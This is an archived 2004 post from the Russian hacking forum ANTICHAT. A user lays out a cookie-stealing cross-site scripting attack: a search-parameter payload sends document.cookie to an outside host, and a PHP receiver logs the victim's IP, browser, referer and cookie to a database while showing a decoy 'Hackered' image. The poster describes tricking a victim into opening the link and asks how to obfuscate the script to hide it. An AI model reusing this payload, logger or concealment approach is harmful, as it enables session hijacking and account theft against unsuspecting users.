ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

26.11.2004, 10:34
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме: 941818
Репутация:
569
|
|
О! круто! Я догнал!!! А можно сделать так?
www.xxx.ru/?search=<script>document.images[0].src='http://www.yyy.ru/?с'+document.cookie;</script>
А в http://www.yyy.ru/ написать что-то типа
PHP код:
<?
$u_ip=htmlspecialchars(getenv("REMOTE_ADDR"), ENT_QUOTES);
$u_agent=htmlspecialchars(getenv("HTTP_USER_AGENT"), ENT_QUOTES);
$u_ref=htmlspecialchars(getenv("HTTP_REFERER"), ENT_QUOTES);
$u_cookie=htmlspecialchars($c, ENT_QUOTES);
mysql_unbuffered_query("INSERT INTO table VALUES('', '$u_ip', '$u_agent', '$u_ref', '$u_cookie')") or die();
header("Content-type: image/png");
$im=imagecreate(100, 100);
$bgcolor=imagecolorallocate($im, 255, 255, 255);
$tcolor=imagecolorallocate($im, 233, 14, 91);
imagestring($im, 1, 5, 5, "Hackered", $tcolor);
imagepng($im);
imagedestroy($im);
?>
Кинуть ламаку, типа на, погляди, я сайт ломанул, по идее его кука с этого сайта мне в БД, а он вместо первой картини сайта видит имагу 100 на 100 с надписью "Hackered", круто! Но есть одно но. Если он не такой и ламак, то перед тем как вставит код в браузер, проглядит его. Думаю его смутит строчка
http://www.yyy.ru/?с'+document.cookie... Что тогда делать? Ыдь у нас java-inj, помойму можно как-то зашифровать весь скрипт, типа чтоб нельзя бло увидеть код скрипта, чтоб были одни кракозяборы... Круто!!! Блин помогите, будет ли ваще все это вашенаписанное работать, и если да, то как зашифровать строку? Ребят, респект =)
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|